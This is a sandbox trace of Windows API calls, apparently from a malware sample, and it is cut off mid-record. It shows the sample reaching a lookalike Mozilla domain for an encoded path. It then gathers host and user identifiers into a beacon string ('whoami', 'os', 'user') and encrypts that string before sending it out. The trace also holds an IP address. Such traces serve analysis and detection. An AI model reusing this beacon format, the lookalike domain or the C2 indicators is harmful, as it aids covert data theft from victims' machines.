(lpString="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak") returned 399 [0048.606] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x190) returned 0x2c5b6a0 [0048.606] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x190) returned 0x2c5b838 [0048.606] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak", wMatch=0x2f) returned="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak" [0048.606] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak", wMatch=0x3f) returned 0x0 [0048.606] memcpy (in: _Dst=0x2c5b6a0, _Src=0x2c5ad18, _Size=0x26 | out: _Dst=0x2c5b6a0) returned 0x2c5b6a0 [0048.606] lstrcpyA (in: lpString1=0x2c5b838, lpString2="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak" | out: lpString1="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak") returned="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak" [0048.606] lstrlenA (lpString="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak") returned 361 [0048.607] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2d3) returned 0x2c5b9d0 [0048.607] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75b50000 [0048.656] GetProcAddress (hModule=0x75b50000, lpProcName="InternetCanonicalizeUrlA") returned 0x75bca787 [0048.656] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak", lpszBuffer=0x2c5b9d0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak", lpdwBufferLength=0x11ff040) returned 1 [0048.666] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b838 | out: hHeap=0x2860000) returned 1 [0048.666] GetProcAddress (hModule=0x75b50000, lpProcName="InternetOpenA") returned 0x75b7f18e [0048.667] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0048.821] GetProcAddress (hModule=0x75b50000, lpProcName="InternetSetStatusCallback") returned 0x75b7933e [0048.821] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0048.821] ResetEvent (hEvent=0x1c4) returned 1 [0048.821] GetProcAddress (hModule=0x75b50000, lpProcName="InternetConnectA") returned 0x75b749e9 [0048.821] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0048.822] SetEvent (hEvent=0x1c4) returned 1 [0048.822] GetProcAddress (hModule=0x75b50000, lpProcName="HttpOpenRequestA") returned 0x75b74c7d [0048.823] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0048.825] GetProcAddress (hModule=0x75b50000, lpProcName="InternetQueryOptionA") returned 0x75b61b56 [0048.825] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0048.826] GetProcAddress (hModule=0x75b50000, lpProcName="InternetSetOptionA") returned 0x75b675e8 [0048.826] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0048.835] GetProcAddress (hModule=0x75b50000, lpProcName="InternetSetOptionA") returned 0x75b675e8 [0048.835] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0048.835] GetProcAddress (hModule=0x75b50000, lpProcName="InternetSetOptionA") returned 0x75b675e8 [0048.835] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0048.835] ResetEvent (hEvent=0x1c4) returned 1 [0048.835] ResetEvent (hEvent=0x1c8) returned 1 [0048.835] GetProcAddress (hModule=0x75b50000, lpProcName="HttpSendRequestA") returned 0x75be18f8 [0048.836] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0048.837] GetLastError () returned 0x3e5 [0048.837] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x102 [0048.837] GetProcAddress (hModule=0x75b50000, lpProcName="HttpQueryInfoA") returned 0x75b6a33e [0048.837] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0048.837] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0049.048] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x0 [0049.048] SetEvent (hEvent=0x1c4) returned 1 [0049.048] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0059.114] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) [0059.114] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0059.115] GetProcAddress (hModule=0x75b50000, lpProcName="InternetCloseHandle") returned 0x75b6ab49 [0059.115] InternetCloseHandle (hInternet=0xcc000c) [0059.115] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0059.116] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0059.116] GetProcAddress (hModule=0x75b50000, lpProcName="InternetCloseHandle") returned 0x75b6ab49 [0059.116] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0059.116] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0059.116] GetProcAddress (hModule=0x75b50000, lpProcName="InternetCloseHandle") returned 0x75b6ab49 [0059.116] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0059.116] CloseHandle (hObject=0x1c4) returned 1 [0059.117] CloseHandle (hObject=0x1c8) returned 1 [0059.119] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b6a0 | out: hHeap=0x2860000) returned 1 [0059.119] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b9d0 | out: hHeap=0x2860000) returned 1 [0059.120] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0059.120] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0059.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ad18 | out: hHeap=0x2860000) returned 1 [0059.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0059.121] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0059.123] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0059.123] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0059.123] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0069.138] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0069.138] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0069.138] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0069.138] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0069.139] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0069.142] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2752948716659) returned 1 [0069.142] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=27529") returned 13 [0069.143] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0069.143] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0069.143] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0069.143] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0069.147] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0069.147] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c59a68, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0069.148] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0069.148] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0069.148] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0069.148] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0069.150] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0069.150] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0069.150] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0069.150] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0069.151] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0069.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHBIBQxXqiK/_2Bgg1jsDn7Rs/cbk", lpUsedDefaultChar=0x0) returned 20 [0069.151] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0069.152] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0069.152] lstrlenA (lpString="80.77.23.77") [0069.152] lstrlenA (lpString="80.77.23.77") returned 11 [0069.152] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0069.152] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e3f, _Size=0xb | out: _Dst=0x2c59a68) returned 0x2c59a68 [0069.152] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0069.152] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5ad18 [0069.152] GetTickCount () returned 0x1a11a37 [0069.152] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59a80 [0069.152] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x7) returned 0x2c59b28 [0069.152] lstrlenA (lpString="%s=%s&") returned 6 [0069.152] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x11) returned 0x2c59b38 [0069.152] sprintf (_Dest=0x2c59b38, _Format="%s=%s&") [0069.152] sprintf (in: _Dest=0x2c59b38, _Format="%s=%s&" | out: _Dest="siogup=vbej&") returned 12 [0069.152] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0069.152] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a80 | out: hHeap=0x2860000) returned 1 [0069.152] lstrlenA (lpString="siogup=vbej&") returned 12 [0069.153] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0069.153] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd2) returned 0x2c59b58 [0069.153] strcpy (_Dest=0x2c59b58, _Source="siogup=vbej&") [0069.153] strcpy (in: _Dest=0x2c59b58, _Source="siogup=vbej&" | out: _Dest="siogup=vbej&") returned="siogup=vbej&" [0069.153] lstrcatA (lpString1="siogup=vbej&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0069.153] lstrcatA (in: lpString1="siogup=vbej&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="siogup=vbej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="siogup=vbej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0069.153] lstrlenA (lpString="siogup=vbej&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27529&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 209 [0069.153] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0069.153] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0069.155] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0069.155] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0069.155] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0069.156] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0069.156] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0069.156] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c38 [0069.156] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.156] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0069.156] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0069.157] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0069.157] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] memcpy (in: _Dst=0x2c59ce8, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59ce8) returned 0x2c59ce8 [0069.157] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] memcpy (in: _Dst=0x2c59cf8, _Src=0x2c59c18, _Size=0x10 | out: _Dst=0x2c59cf8) returned 0x2c59cf8 [0069.157] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] memcpy (in: _Dst=0x2c59d08, _Src=0x2c59c28, _Size=0x2 | out: _Dst=0x2c59d08) returned 0x2c59d08 [0069.157] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, 